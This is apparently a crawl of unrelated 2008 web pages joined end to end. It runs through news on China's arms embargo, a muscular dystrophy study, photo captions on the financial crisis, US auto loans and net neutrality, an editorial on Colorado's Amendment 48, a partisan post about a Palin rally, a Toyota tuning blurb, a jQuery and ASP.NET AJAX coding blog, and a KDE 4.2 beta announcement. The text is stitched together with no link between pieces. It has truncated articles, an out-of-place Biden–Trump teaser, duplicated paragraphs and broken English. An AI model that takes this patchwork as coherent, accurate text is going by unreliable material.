" US and EU countries on one hand ask us to send more troops to peacekeeping operations overseas , while on the other , they still have such arms sales embargoes on China .
I think that is quite unreasonable , " Maj Gen Qian was reported to have said .
The Pentagon said this year that China was actively engaged in aircraft carrier research and would be able to start building one by the end of this decade .
Jane 's Defence Weekly reported last month that the PLA was training 50 students to become naval pilots capable of operating fixed - wing aircraft from such a ship .
Earlier this year , the head of the US Pacific Command , Admiral Timothy Keating , was reported to have said that Chinese military leaders were intensely interested in such an acquisition .
In March 2007 , a Beijing - backed Hong Kong newspaper reported that China could have its first aircraft carrier by 2010 .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Viagra Helps With Muscular Dystrophy Fatigue - And That May Help Us Discover Targeted Therapies
A University of Iowa study suggests that the prolonged fatigue after mild exercise that occurs in people with many forms of muscular dystrophy is distinct from the inherent muscle weakness caused by the disease .
The research , which is published in Nature Advance Online Publication Oct. 26 , identifies a faulty signaling pathway that appears to cause exercise - induced fatigue in mouse models of muscular dystrophy .
Moreover , the study shows that Viagra can overcome the signaling defect and relieve the fatigue .
The findings suggest that targeting the signaling pathway may lead to therapies for this type of fatigue .
" This is an exciting finding and our research suggests that there probably are many different neuromuscular conditions where fatigue could be treated by targeting this newly discovered pathway , " said Kevin Campbell , Ph.D. , UI professor and head of molecular physiology and biophysics and a Howard Hughes Medical Institute investigator , who holds the Roy J. Carver Chair of Physiology and Biophysics .
Using animal models , the researchers showed that if an enzyme called neuronal nitric oxide synthase ( nNOS ) is not present at its normal location on the muscle membrane , then blood vessels that supply active muscles do not relax normally and the animals experience post - exercise fatigue .
Early clues about the role of nNOS came from observing that the significant inactivity of dystrophic mice following mild exercise was very similar to the fatigue experience by muscular dystrophy patients after a short period of walking .
" A clinician colleague said , ' Those mice behave just like my patients with Becker muscular dystrophy . '
As soon as he said that we knew what might be going on , because Becker patients have mislocalized nNOS , " Campbell said .
Working with mouse models of muscular dystrophy and normal mice engineered to lack nNOS , the UI team , including lead study author Yvonne Kobayashi , Ph.D. , UI research associate in molecular physiology and biophysics , showed that mice with misplaced or missing nNOS exhibited prolonged fatigue after mild exercise .
" The mice without nNOS have normal muscles and can exercise quite well , but after just mild exercise , we found that they had the intense fatigue response , " Kobayashi said .
Blood vessel imaging of these mice showed post - exercise constriction of the blood vessels supplying muscle .
Blocking nNOS activity in normal mice also produced post - exercise fatigue and narrowed blood vessels to the muscles .
The team also found that although gene therapy could restore the structure and function of an important component of muscle membranes in mice with muscular dystrophy , this treatment did not alleviate the post - exercise fatigue .
Further analysis showed that although the muscle membrane complex was intact , nNOS was still not correctly localized to the membrane , and blood vessels supplying skeletal muscle were abnormally constricted after mild exercise .
" The signaling pathway probably maintains blood flow into the muscle during exercise and keeps the blood flow going after exercise .
But when nNOS is missing or mislocalized , this pathway breaks down , " Campbell explained .
" The mice with mislocalized nNOS are able to exercise , but after exercise that reduced blood flow to the recovering muscles produces the fatigue . "
To determine if nNOS was affected in humans with muscular dystrophy , Steven Moore , M.D. , Ph.D. , UI professor of pathology and study co-author , examined muscle biopsies from 425 patients with many different forms of muscular dystrophy .
He found that nNOS was missing or reduced in most cases , suggesting a common mechanism of fatigue .
" Our findings could lead to a better understanding of fatigue under other physiological conditions in which muscle nNOS expression , localization , or activity is affected , " Kobayashi added .
The enzyme nNOS makes a signaling molecule called nitric oxide , which stimulates production of a chemical called cGMP that causes smooth muscle around blood vessels to relax thereby increasing blood flow .
This nitric oxide signaling pathway is turned off by phosphodiesterase ( PDE ) , an enzyme that breaks down cGMP .
Viagra , a drug designed to increase blood flow , inhibits PDE and prolongs the existence of the cGMP molecules that promote blood vessel dilation .
The researchers showed that Viagra could alleviate fatigue in mice with mislocalized nNOS .
" The mice that have the nNOS mislocalized still have some nitric oxide signaling , but the Viagra enhances that signal by inhibiting PDE and preventing breakdown of cGMP , " Campbell said .
Probably , there are no country with opened economy in the world , which has not suffered from financial crisis .
Troubles about solvency of the biggest financial institutions of U.S.A. and Europe push the world financial system to systematic collapse .
British Prime Minister Gordon Brown and Chancellor of the Exchequer Alistair Darling ask parliament to adopt £ 500 billion bailout for the British banking system .
Lame duck U.S. President George W. Bush held an Oct. 11 meeting with finance ministers of G7 , as well as with heads of the IMF and World Bank .
At the end of the meeting , Bush said that all its members recognize the seriousness of the current crisis , and that the global crisis requires a global response .
The challenge is that the actions of one country do not run or do not undermine the actions of another .
U.S. Treasury Henry Paulson .
George W. Bush and Henry Paulson after the U.S. Congress from the second attempt passed bill on the redemption the country ’s financial system over 700 billion dollars owed to American taxpayers .
Protests spread to the United States of the people , who oppose the proposed White House plan of support of financial sector , which will cost the budget in the amount of $ 700 billion .
Women ’s anti-war activists and human rights organization « Code Pink » defend the interests of ordinary
taxpayers .
PR-action of organization « Barely Political » outside the New York Stock Exchange .
German Chancellor Angela Merkel .
Right to left : British Prime Minister Gordon Brown , French President Nicolas Sarkozy , Italian Prime Minister Silvio Berlusconi and German Chancellor Angela Merkel .
At October 6 index of Dow Jones for the first time in four years dropped below 10,000 points .
New York Stock Exchange .
New York Exchange ( NYSE ) .
According to the latest data , the U.S. owed more than 10 trillion 200 billion dollars .
The electronic scoreboard at the heart of New York was not prepared for the current level of public debt of United States .
Killing figures do n’t fit the screen .
The Russian business newspaper « Kommersant » : « The market beaten down to the bottom » .
Since the beginning of the financial crisis the richest Russians have lost a total of $ 230 billion or 52 % its capital .
These are the outcome of the crisis in the financial projections for the state of Russian billionaires .
Russian President Dmitry Medvedev and Chairman of the Supervisory Board « Alfa Group » Mikhail Fridman .
There is information about the imposition of economic censorship on public television , which allegedly banned on - air mention the word « crisis » and « collapse » .
None of the three major Russian channels – Channel One , Russia and NTV did not report record 19 - percent fall in Russian stocks on Monday October 6 .
Instead , they talked about meeting of President Medvedev and Mikhail Friedman , during which were discussed opportunities that have arisen for Russian companies in connection with the global financial crisis .
During a recent visit to the Magadan region Dmitry Medvedev got acquainted with the production of gold and silver ingots at Kolymsky Affinazhny plant and an exhibition of Magadan Local History Museum .
« Gold necessary to show – especially at a time when people raise some doubts ! » , – Said Medvedev , convinced that for market word is gold .
Dubai Stock Exchange .
Brazilian Mercantile & Futures Exchange ( BM&F ) .
Panic on Sao Paolo Exchange .
Frankfurt Stock Exchange .
Frankfurt Stock Exchange ( FSE ) .
Stock Exchange Jakarta , Indonesia .
The work of the Jakarta Stock Exchange was suspended on Wednesday after the index fell more than 10 % – up to the lowest in the past three years level .
Jakarta Stock Exchange ( JSE ) .
Stock Exchange of Malaysia – Kuala Lumpur Stock Exchange .
Kuwait Stock Exchange .
Kuwait Stock Exchange ( KWE ) .
The protest outside the bank Lloyd ’s TSB in London .
London Stock Exchange ( LSE ) .
Madrid Stock Exchange ( Bolsas y Mercados Espanoles ) .
Remelting of various ornaments made of gold in gold bullion at gauging the Austrian factory Ogussa GmbH .
Due to the fact that the end of the financial crisis had not yet seen the European man in the street prefer to invest finance in traditional values such as , for example , gold .
Moreover , there is unprecedented rise in the prices of precious metals .
At the New York Stock Exchange price for troy ounce reached $ 888 , very close to the psychological mark of $ 900 .
According to German media , orders for manufacturing products made of gold has taken a month in advance .
Gold ingots are also bought , a deficit of which has already affected .
The head of the European Central Bank Jean - Claude Trichet .
European Central Bank President Jean - Claude Trichet called on market participants to calm down and said that European Central Bank is ready to provide market liquidity for as long as necessary .
Italian Prime Minister Silvio Berlusconi .
The Tokyo Stock Exchange .
Tokyo Stock Exchange ( TSE ) .
Photos : Reuters , AFP , AP .
« Obama mania in the world | Main | Fighting politicians in different countries »
WASHINGTON ( Dow Jones ) -- Top House and Senate lawmakers said Tuesday that Congress would look for an additional $ 25 billion for a government - loan package for U.S. auto companies over the next three years .
The money would be added to $ 25 billion in loans that is included in a must - pass government - spending bill that lawmakers are expected to approve this week .
" We just wanted you to know there 's more that needs to be done , " said House Energy and Commerce Committee Chairman John Dingell , D - Mich . , adding that lawmakers would begin working on the second $ 25 billion " at the earliest possible moment . "
Congress is expected to adjourn this week , likely for the year , meaning that the next allotment for the auto industry will wait until a new Congress and president is installed .
Dingell appeared Tuesday with a handful of Michigan lawmakers who applauded the auto loan program , saying the money is critical to stem job loss for auto companies .
Sen. Debbie Stabenow , D - Mich. , said the program will help keep " good paying middle class jobs here " in the country .
Republicans and Democrats from Michigan have been working for months with the administration to hammer out the details of the program .
The loan program was authorized as part of last year 's energy bill , which requires auto makers to meet a 35 mile - per - gallon standard for fuel efficiency by 2020 .
The loans would go to auto makers to retool older plants to make fuel - efficient vehicles .
Plants older than 20 years would receive preference .
Lawmakers who pushed for the money said auto makers are in trouble because they have been required to take out high - cost loans they can't afford to retool their plants .
The Detroit Big Three auto makers - General Motors Corp. GM , - 2.37 % , Ford Motor Co. F , - 1.34 % and Chrysler LLC - would be the most likely of auto companies in the U.S. to benefit from the program .
- By Fawn Johnson , Dow Jones Newswires ; 202-862-9263 ; fawn.johnson@dowjones.com
( END ) Dow Jones Newswires
September 24 , 2008 11:18 ET ( 15:18 GMT )
- Contact : 201-938-5400
A proposed amendment to the Colorado state constitution that would define a human egg as a “ person ” from the moment of fertilization would go far beyond its intended purpose of outlawing practically all abortions .
Philosophers may debate when human life begins , but scientists are unanimous on the subject of when pregnancy begins : it ’s when a fertilized egg is implanted in the uterus .
But the proposed Amendment 48 specifies that the egg be considered a “ person ” in the eyes of the law even before it is implanted in the uterus .
That means , effectively , that those forms of birth control that prevent such implantation would be classified as homicide under the proposal .
Even without the use of drugs , many eggs just naturally fail to implant in the uterus .
Likewise , many eggs are implanted only to result in a miscarriage in the early days or weeks of pregnancy — often before the woman is even aware she is pregnant .
Should a woman who suffers a miscarriage be charged with negligent homicide because she failed to protect a fertilized egg she may not have even known she carried ?
Should a man who fertilized an egg be entitled to file a civil lawsuit against a woman who miscarries , charging her with the wrongful death of his week - old fertilized egg ?
Unfortunately , none of these possibilities is far - fetched .
They would be the almost certain results of the mischievous interaction of the proposed Colorado constitutional amendment with the 14th Amendment to the U.S. Constitution .
Here ’s the proposed state amendment : Section 31 .
Person defined .
As used in sections 3 , 6 , and 25 of Article II of the state constitution , the terms “ person ” or “ persons ” shall include any human being from the moment of fertilization .
Here ’s the relevant portion of the U.S. Constitution : nor shall any State deprive any person of life , liberty , or property , without due process of law ; nor deny to any person within its jurisdiction the equal protection of the laws .
If a fertilized egg is a person , just what are that egg ’s rights under Colorado law ?
The question is anything but hypothetical , because the entire abortion debate that culminated in the U.S. Supreme Court ’s 1973 Roe vs.
Wade decision rests upon that language in the 14th Amendment .
If the fetus is a person under the law , its life cannot be taken without due process , which means states can outlaw abortion at any stage of pregnancy .
Roe vs .
Wade answered that question by defining a fetus as a person only in the third trimester of a pregnancy , during which it could conceivably live independently outside of the womb .
Thus , under Roe vs.
Wade , abortions can be banned in the third trimester , as long as exceptions are made for the life or health of the other “ person ” in the equation , the mother .
But by pushing the definition of “ personhood ” to fertilization , the proposed Colorado amendment creates an absurd and unworkable maze .
What about women who have difficulty conceiving and try in vitro fertilization .
Typically , a number of fertilized embryos are created and frozen .
Once pregnancy occurs , the superfluous embryos are often discarded .
But under the Colorado “ eggs are people ” law , that would be murder .
Amendment 48 goes far beyond banning abortion and many forms of birth control .
It is legal mischief and should be solidly rejected by the voters in November .
Coming on the heels of John McCain whipping up a crowd of supporters who called Obama a “ terrorist , ” and Sarah Palin getting her audience to yell “ Kill him ! ” ( apparently about Obama ) , we now find out that Sarah Palin ’s mob of supporters yesterday turned on a black journalist and yelled “ racial epithets ” at him while telling him to “ sit down , boy . ”
From the Washington Post :
Worse , Palin ’s routine attacks on the media have begun to spill into ugliness .
In Clearwater , arriving reporters were greeted with shouts and taunts by the crowd of about 3,000 .
Palin then went on to blame Katie Couric ’s questions for her “ less - than - successful interview with kinda mainstream media . ”
At that , Palin supporters turned on reporters in the press area , waving thunder sticks and shouting abuse .
Others hurled obscenities at a camera crew .
One Palin supporter shouted a racial epithet at an African American sound man for a network and told him , “ Sit down , boy . ”
Need any more proof of the divisiveness and elitism that John McCain and Sarah Palin are bringing to our country ?
Imagine , whipping up a crowd to hate “ the other . ”
Any surprise that Palin and McCain have so many ties to anti-Semites ?
If Joe Biden defeats Donald Trump in November , the question he will face is not whether to restore the liberal international order .
It is whether the US can work with an inner core of allies to promote democracy and human rights while ...
Read More
WASHINGTON ( Reuters ) - A Democratic sweep in Tuesday ’s U.S. elections may clear the way for changes to Internet policy sought by Google Inc < GOOG.
O that would bar Internet providers from discriminating against some Web content .
Google T - Mobile G1 mobile telephones are seen on display at a T - Mobile store in New York City , October 22 , 2008 .
REUTERS / Mike Segar
The " net neutrality " issue pits Internet service providers ( ISPs ) like Comcast Corp CMCSA.O and AT&T T.N against content companies like Google and Microsoft Corp MSFT.O .
" Probably the thing that scares the industry the most about a Democratic administration is regulating the Internet , " Dan Hesse , chief executive of Sprint Nextel S.N , said in a speech in Washington on October 24 .
Prices for cable television , Internet advertising and privacy are other issues likely to move forward if the Democrats win more seats in Congress , as expected .
A win by Democratic presidential candidate Barack Obama in the November 4 poll would add further steam and give Democrats a majority on the Federal Communications Commission .
Obama takes the side of net neutrality backers , who say ISPs should not be able to discriminate against certain types of Internet traffic requiring more bandwidth , such as the downloading of movies , or block certain content altogether .
But Internet providers say government involvement in the Internet will amount to its nationalization and they need to be able to take reasonable steps to control traffic .
Republican presidential candidate John McCain opposes net neutrality .
A bill mandating some network requirements failed to move in Congress this year , and Comcast sued the FCC , saying the agency exceeded its authority by ruling Comcast violated net neutrality principles by blocking certain applications .
Google Chief Executive Eric Schmidt is one of Obama ’s supporters and backs a law on neutrality .
“ We prefer a law .
At the same time , there are lots of ways to promote market discipline and the threat of law may go a long way toward getting us there , ” said Alan Davidson , Google ’s chief lobbyist .
TRACK RECORD
McCain led the powerful Senate Commerce Committee for several years beginning in the late 1990s .
He was the sole Senate Republican to vote against a 1996 law requiring big phone companies to lease their phone networks to rivals to spur local competition .
He also sponsored a bill that would have taken away the FCC ’s ability to halt telecom mergers that were not in the public interest .
“ In general , McCain takes the side of the telecom companies , ” said Nicholas Thompson , a fellow at the New America Foundation and writer for Wired magazine .
He wrote a recent article with the opening sentence : “ John McCain is an AT&T guy ; Barack Obama is a Google guy . ”
Indeed , donors associated with AT&T were the seventh biggest bloc giving to McCain in the current election cycle and Google - linked donors were the fifth biggest group of contributors to Obama , according to the Center for Responsive Politics , which tracks political spending .
An industry official , who is a self - described Democrat , cautioned against broad assumptions about the candidates , pointing to Obama ’s use of the Internet to raise money , and his pledge to use broadband to spur economic development .
“ It ’s wrong to think an Obama Administration would be knee - jerk against the very companies that are building the platform for growth , ” this person said .
Obama has also called for using funds that now finance universal telephone service to bring broadband to places where it is not economically viable , like rural areas .
The bits , bytes and bandwidth of telecommunications policy have traditionally been less partisan issues in Washington than defense or healthcare , said analysts and industry sources .
" Certainly if a member has a vibrant technology sector in their state or district , by definition they will have a pretty good understanding of the role that high technology plays in the economy , " regardless of party , said Jack Krumholtz , Microsoft Corp 's MSFT .
O chief lobbyist .
COMMITTEE FLUX
Even if Democrats improve their majorities in Congress as expected , major changes are expected in the leadership of the Senate Commerce Committee that oversees communications issues .
“ That will be one thing to affect the industry the most from a Congressional standpoint , ” said another industry source .
A game of musical chairs could take place in the next Congress come January if current commerce chairman , Democratic Sen. Daniel Inouye of Hawaii , were to move to the appropriations panel .
Under various scenarios , the commerce chairmanship could go to either Sen. John Kerry , John Rockefeller or Byron Dorgan .
Changes may also be in store for Republicans on the Senate Commerce Committee .
The current ranking Republican , Sen .
Ted Stevens of Alaska , may not survive a tight reelection fight after being recently convicted on felony corruption charges .
Internet privacy issues are likely to receive continued attention next year .
Democrats held a hearing this year on whether consumers should be able to stop their online behavior from being tracked .
AT&T and Verizon have agreed not to track consumer behavior online unless consumers “ opt - in ” to do so .
Google says it ca n’t be compared to Internet providers and backs self - regulation .
Cable companies like Comcast have reason to fear a McCain presidency .
He has pushed for them to sell individual channels to customers “ a la carte , ” so they can get just the programing they want , a proposal the cable industry fervently opposes .
The demand for regulation in the turbulent financial sector could also spill over into communication issues .
“ If one looks at macro trends , regulation is making a comeback , ” said Blair Levin , an analyst at Stifel Nicolaus and once a chief of staff to former Democratic FCC Chairman Reed Hundt .
“ The default position of ‘ we do n’t know what to do , let ’s deregulate ’ is fading away . ”
Toyota was announced this November at SEMA Show and will exhibit two modified versions of the model Venza .
Together with the Street Image and Five Axis tuners , the Japanese manufacturer plans to show us a different look to the crossover .
Toyota was announced this November at SEMA Show and will exhibit two modified versions of the model Venza .
Together with the Street Image and Five Axis tuners , the Japanese manufacturer plans to show us a different look to the crossover .
SportLux Venza by Street Image benefits from an outside body kit changed and rims , while the interior has skin and find a multimedia system .
More than that , Street Image improved engine performance , braking system and suspension .
Toyota Venza at SEMA Showby Five Axis will , besides the new body kit and 20 inches rims has a special system called the Integrated Cargo Carrier ( ICC ) to allow the transport of various recreational facilities such as Ski or bicycles .
I 've done a series of four podcasts dedicated to JavaScript over the last month .
Why ?
Because of this rockin ' sweet announcement :
Microsoft is going to make jQuery part of the official dev platform .
JQuery will come with Visual Studio in the long term , and in the short term it'll ship with ASP .
NET MVC .
We 'll also ship a version includes Intellisense in Visual Studio .
The Announcement Blog Posts
This is cool because we 're using jQuery just as it is .
It 's Open Source , and we 'll use it and ship it via its MIT license , unchanged .
If there 's changes we want , we 'll submit a patch just like anyone else .
JQuery will also have full support from PSS ( Product Support Services ) like any other Microsoft product , starting later this year .
Folks have said Microsoft would never include Open Source in the platform , I 'm hoping this move is representative of a bright future .
j Query Intellisense
Visual Studio 2008 has very nice JavaScript intellisense support that can be made richer by the inclusion of comments for methods in 3rd party libraries .
Today you can search the web and find intellisense - enabled jQuery files hacked together by the community , but we intend to offer official support for intellisense in jQuery soon .
JQuery is really complimentary to MS - Ajax .
For example , we had been talking about writing CSS - Selector support , but figured , jQuery does it really well , why not just use it ?
JavaScript Libraries Play Well With Others
I wanted to put together a little demo application that used jQuery to spice up a talk I 've given on ADO.
NET Data Services .
The app would retrieve some data from a Bikes database , and would have some radio buttons to change the color queried .
The whole application is a single static page .
There 's no code - behind and the only server - side work is the data retrieval from SQL .
However , the concepts could be applied to ASP .
NET WebForms or ASP.NE T MVC .
Here 's a one page app using :
ADO.NET Data Services and it's JavaScript Client Library
ASP.NET AJAX
ASP .NET AJAX Client Templating ( Preview )
j Query 1.2.6
It looks like this :
Here 's what 's going on underneath .
First , I 'm retrieving data from SQL Server and I need it in JSON format .
I 'm using the AJAX Client Library for ADO.
NET Data Services to make a REST ( GET ) query to the back - end .
To start with I 'll just get the data ... I include " datatable.js " as a client - side script and use Sys.Data.DataService ( ) to make an async query .
In JavaScript you can tell it's a Microsoft type if it's got " Sys. " front of it .
All the client support for ADO.
NET Data Services is in datatable .js .
I 'll be getting back dynamically created JSON objects that look just like my server - side data .
In the query I 'm asking for the top 5 results given a color .
BTW , the first line of LoadBikes ( ) is a little JavaScript syntax that says " if q is n't there , then make a q that equals " Red . "
< script type =" text / javascript " src= " Scripts/DataService.js " ></ script >
< script type =" text / javascript " >
var bikes ;
Sys.Application.add_init(function ( ) {
LoadBikes ( ) ;
} ) ;
function LoadBikes(q ) {
q = q || " Red " ;
var svc = new Sys.Data.DataService ( " bikes.svc " ) ;
svc.query ( " / Products ?$filter=Color eq ' " + q + " ' & $ top=5 " , OnProductsLoaded ) ;
}
...
When I get back the results from the asynchronous query call , I could use string concatenation with the ASP .
NET AJAX Sys.
StringBuilder type to build HTML on the fly like this :
var html = new Sys. StringBuilder ( " < ul > " ) ;
for ( var i = 0 ; i < result.length ; i++ ) {
html.append ( " < li>< div class= \" bikerow\ " > " ) ;
html.append ( " < img src= \" bikes.svc/Products ( " + result [ i ] .
ProductID + " ) / Photo / $value\ " > " + result [ i ] .
Name + " " + result [ i ].
ListPrice ) ;
html.append("</div></li > " ) ;
}
html.append ( " </ul > " ) ;
$ get ( " tbl " ) .innerHTML = html.toString ( ) ;
There 's MANY ways to get the exact same results in JavaScript when you introduce different libraries .
There 's tradeoff's between size , speed , maintainability , and your happiness .
It 's nice to pick and choose .
Rather than using StringBuilder , I 'll use the new ( preview ) ASP .
NET AJAX 4.0 Client Template stuff from BLR , Dave Reed , Boris Rivers - Moore and Nghi Nguyen .
This is more declarative and easy to maintain way to accomplish the same thing .
< div id =" bikes " class = " sys- template " >
< ul >
< li >
< div class = " bikerow " >
< img sys:src= " {{' bikes.svc/Products (' + ProductID + ') / Photo / $value '}} " />
{{Name + ' ' + ListPrice}}
</div >
</li >
</ul >
</div >
This is a declaration of what I want the table to look like with {{ binding expressions }} in curly braces .
The img src= is an ADO .
NET Data Services HREF to a product image in the database like " / bikes.svc / Products ( 740 ) / Photo / $value " that returns an image directly .
I 'll add ASP .
NET AJAX 's JavaScript library along with the Preview Templates script from CodePlex :
< script type =" text / javascript " src= " Scripts/MicrosoftAjax.debug.js " ></ script >
< script type =" text / javascript " src= " Scripts/MicrosoftAjaxTemplates.debug.js " ></ script >
Then , when things are initialized , I 'll $ get ( ) that template and make a Sys.
UI .
DataView and store it in a variable called " bikes " and when asynchronous call returns , I 'll take the array of data from result and apply it to the DataView .
< script type =" text / javascript " >
var bikes ;
Sys.Application.add_init(function ( ) {
bikes = $ create ( Sys.UI.DataView , {} , {} , {} , $ get ( " bikes " ) ) ;
LoadBikes ( ) ;
} ) ;
...
function OnUsersLoaded ( result ) {
bikes.set_data( result ) ; ...
Now , I 'll start leaning heavily on the jQuery library to change the background colors of just the even - numbered items in my list .
I 'll also add 100 ms animation that draws a border and increases the font size of the item the mouse is over .
Notice the " chaining " of the functions as I modify the div .
Each method returns the jQuery object so you can increase fluency with chaining as much as you like .
I 'll also use jQuery to easily setup a group of click events on the radio buttons .
The complete hacked - together code is this :
< html xmlns= " http://www.w3.org/1999/xhtml " >
< head runat= " server " >
< title > Friggin ' Sweet </ title >
< link href=" styles.css " rel=" stylesheet " type =" text/css " />
< script type =" text / javascript " src= " Scripts/MicrosoftAjax.debug.js " ></ script >
< script type =" text / javascript " src= " Scripts/MicrosoftAjaxTemplates.debug.js " ></ script >
< script type =" text / javascript " src= " Scripts/DataService.js " ></ script >
< script type =" text / javascript " src= " Scripts / jquery -1.2.6-intellisense.js " ></ script >
< script type =" text / javascript " src= " Scripts/DataService.js " ></ script >
< script type =" text / javascript " >
var bikes ;
Sys.Application.add_init(function ( ) {
bikes = $ create ( Sys.UI.DataView , {} , {} , {} , $ get ( " bikes " ) ) ;
$ ( ".colorfilter " ) .click ( function(e ) {
LoadBikes ( $ ( this ) .val ( ) ) ;
} ) ;
LoadBikes ( ) ;
} ) ;
function LoadBikes(q ) {
q = q || " Red " ;
var svc = new Sys.Data.DataService ( " bikes.svc " ) ;
svc.query ( " / Products ?$filter=Color eq ' " + q + " ' & $ top=5 " , OnProductsLoaded ) ;
}
function OnProductsLoaded ( result ) {
bikes.set_data( result ) ;
$ ( " ul li:even " ) .css ( " background - color " , " lightyellow " ) ;
$ ( " ul li " ) .css ( " width " , " 450 px " ) .css ( " font - size " , " 12 px " ) ;
$ (" div.bikerow " ) .mouseover ( function(e ) {
$ ( this ) .animate ( {
fontSize : " 18 px " ,
border : " 2px solid black "
} , 100 ) ;
} ).mouseout ( function(e ) {
$ ( this ) .animate ( {
fontSize : " 12 px " ,
border : " 0 p x "
} , 100 ) ;
} ) ;
}
Sys.Application.initialize( ) ;
</script >
</head >
< body xmlns:sys= " javascript : Sys " >
< form id =" form1 " runat= " server " >
< input type =" radio " class=" colorfilter " name = " color " value = " Red " />
Red
< input type =" radio " class=" colorfilter " name = " color " value = " Silver " />
Silver
< input type =" radio " class=" colorfilter " name = " color " value = " White " />
White
< input type =" radio " class=" colorfilter " name = " color " value= " Multi " />
Multi
< input type =" radio " class=" colorfilter " name = " color " value = " Black " />
Black
< div >
< div id =" tbl " >
</div >
< div id =" bikes " class = " sys- template " >
< ul >
< li >
< div class = " bikerow " >
< img sys:src= " {{' bikes.svc/Products (' + ProductID + ') / Photo / $ value '}} " />
{{Name + ' ' + ListPrice}}
</div >
</li >
</ul >
</div >
</div >
</ form >
</ body >
</html >
And it looks like this .
Notice that I 've got FireBug open and you can see three AJAX calls via ADO.
NET Data Services with different queries .
I 'm hovering the mouse over the second bike , so its font is larger it has a border .
All of the scripts getting along happily .
My code clearly sloppy , but this is a good example of how jQuery provides functionality that the Microsoft libraries do n't .
Things are better when the libraries are used together .
JQuery complements ASP.NET , ASP.NET AJAX and ASP.
NET MVC nicely and jQuery already has a large following within the .NET community .
That 's why we 're going to ship , support and promote jQuery in ASP .
NET , ASP.NET MVC and Visual Studio going forward .
This was a simplistic example and I 'm sure you 've got better ideas , so I 'd encourage you to go around the Net and get involved in the dynamic jQuery community .
If you 've used jQuery on an ASP .
NET site , sound off in the comments .
JQuery Resources
Hanselminutes JavaScript Podcast Series
* Thanks to Pablo Castro for his Bike database and ongoing help .
Big thanks to Scott Koon for helping me debug my demo at 2 am this morning using CrossLoop while kindly not asking what I was working on .
Also thanks indirectly to Rick Strahl for his excellent .NET ( and often jQuery ) blog .
KDE 4.2 Beta 1 Release Announcement
KDE 4.2 Beta 1 Provides First Look at Upcoming User Experience
KDE Commmunity Ships First Beta Release of KDE 4.2 , Inviting Community to Test and Report Bugs .
November 26 , 2008 .
The KDE Community today announced the immediate availability of " Caterpillar " , ( a.k.a KDE 4.2 Beta 1 ) , the first testing release of the new KDE 4.2 desktop .
Caterpillar is aimed at testers and reviewers .
It should provide a solid ground to report bugs that need to be tackled before KDE 4.2.0 is released .
Reviewers can use this beta to get a first look at the upcoming KDE 4.2 desktop which provides significant improvements all over the desktop and applications .
With 885 bugs closed in the past week , the KDE community is now in bugfixing mode in order to provide a smooth KDE 4.2.0 to end users in January .
A KDE 4.2 Beta 1 Desktop A KDE 4.2 Beta 1 Desktop
Significant refinements of Plasma and KWin , the KDE workspace
For the 4.2 release , the KDE team has fixed literally thousands of bugs and has implemented dozens of features that were missing until now in KDE 4 . 2 fixes your issues .
This beta release gives you the opportunity to assist in ironing out the remaining wrinkles .
The KDE release team has put together a list with the most significant improvements in 4.2 Beta 1 :
Compositing desktop effects are enabled where hardware and drivers support it , with a basic default setup .
Automatic checks confirm that compositing works before enabling it on the workspace .
are enabled where hardware and drivers support it , with a basic default setup .
Automatic checks confirm that compositing works before enabling it on the workspace .
New desktop effects have been added such as the Magic Lamp , Minimize effect , Cube and Sphere desktop switchers .
Others , such as the desktop grid , have been improved .
All effects have been polished and and feel natural due to the use of motion dynamics .
The user interface for choosing effects has been reworked for easy selection of the most commonly used effects .
have been added such as the Magic Lamp , Minimize effect , Cube and Sphere desktop switchers .
Others , such as the desktop grid , have been improved .
All effects have been polished and and feel natural due to the use of motion dynamics .
The user interface for choosing effects has been reworked for easy selection of the most commonly used effects .
Central elements of the desktop experience have seen significant improvements to give a usable and coherent experience .
These include grouping and multiple row layout in the task bar , icon hiding in the system tray , notifications and job tracking by Plasma , the ability to have icons on the desktop again by using a Folder View as the desktop background .
Restored features and minor tweaks round out the work , such as the return of panel autohiding to maximise your productive screen space , icons now remain where they are placed in the Folder View , the location of new applets is improved , and window previews and tooltips are back in the panel and Task Bar .
of the desktop experience have seen significant improvements to give a usable and coherent experience .
These include grouping and multiple row layout in the task bar , icon hiding in the system tray , notifications and job tracking by Plasma , the ability to have icons on the desktop again by using a Folder View as the desktop background .
Restored features and minor tweaks round out the work , such as the return of panel autohiding to maximise your productive screen space , icons now remain where they are placed in the Folder View , the location of new applets is improved , and window previews and tooltips are back in the panel and Task Bar .
New Plasma applets include applets for leaving messages on a locked screen , previewing files , switching desktop Activity , monitoring news feeds , and utilities like the pastebin applet , the calendar , timer , special character selector , a quicklaunch applet , a system monitor , among many others .
include applets for leaving messages on a locked screen , previewing files , switching desktop Activity , monitoring news feeds , and utilities like the pastebin applet , the calendar , timer , special character selector , a quicklaunch applet , a system monitor , among many others .
KRunner , the " Run command ... " dialog has extended functionality through several new plugins , including spellchecking , konqueror browser history , power management control through PowerDevil , KDE Places , Recent Documents , and the ability to start specific sessions of the Kate editor , Konqueror and Konsole .
The converter plugin now also supports quickly converting between units of speed , mass and distances .
has extended functionality through several new plugins , including spellchecking , konqueror browser history , power management control through PowerDevil , KDE Places , Recent Documents , and the ability to start specific sessions of the Kate editor , Konqueror and Konsole .
The converter plugin now also supports quickly converting between units of speed , mass and distances .
The Plasma workspace can now load Google Gadgets .
Plasma applets can be written in Ruby and Python .
Support for applets written in JavaScript and Mac OS dashboard widgets has been further improved .
. Plasma can be written in and .
Support for applets written in JavaScript and Mac OS dashboard widgets has been further improved .
Wallpapers are now provided plugins , so developers can easily write custom wallpaper systems in KDE 4.2 .
Available wallpaper plugins in KDE 4.2 will be slideshows , Mandelbrot fractals , and of course regular static images .
in KDE 4.2 .
Available wallpaper plugins in KDE 4.2 will be slideshows , Mandelbrot fractals , and of course regular static images .
Theming improvements in the Task Bar , Application Launcher , System Tray and most other Plasma components streamline the look and feel and increase consistency .
A new System Settings module , Desktop Theme Details , gives the user control over each element of various Plasma themes .
in the Task Bar , Application Launcher , System Tray and most other Plasma components streamline the look and feel and increase consistency .
A new System Settings module , Desktop Theme Details , gives the user control over each element of various Plasma themes .
Multi-screen support has been improved through the Kephal library , fixing many bugs when running KDE on more than one monitor .
Desktop as Folder View ( traditional desktop ) Desktop as Folder View ( traditional desktop )
New and Improved Applications
All applications have seen bugfixes , feature additions , user interface improvements and generally received more polish during the last 4 months of development .
The following list gives some ideas about the areas of improvement .
Dolphin now supports previews of files in toolbars and has gained a slider to zoom in and out on file item views .
It can now also show the full path in the breadcrumb bar .
Konqueror offers increased loading speed by prefetching domain name data in KHTML .
A find - as - you - type bar improves navigation in webpages .
by prefetching domain name data in KHTML .
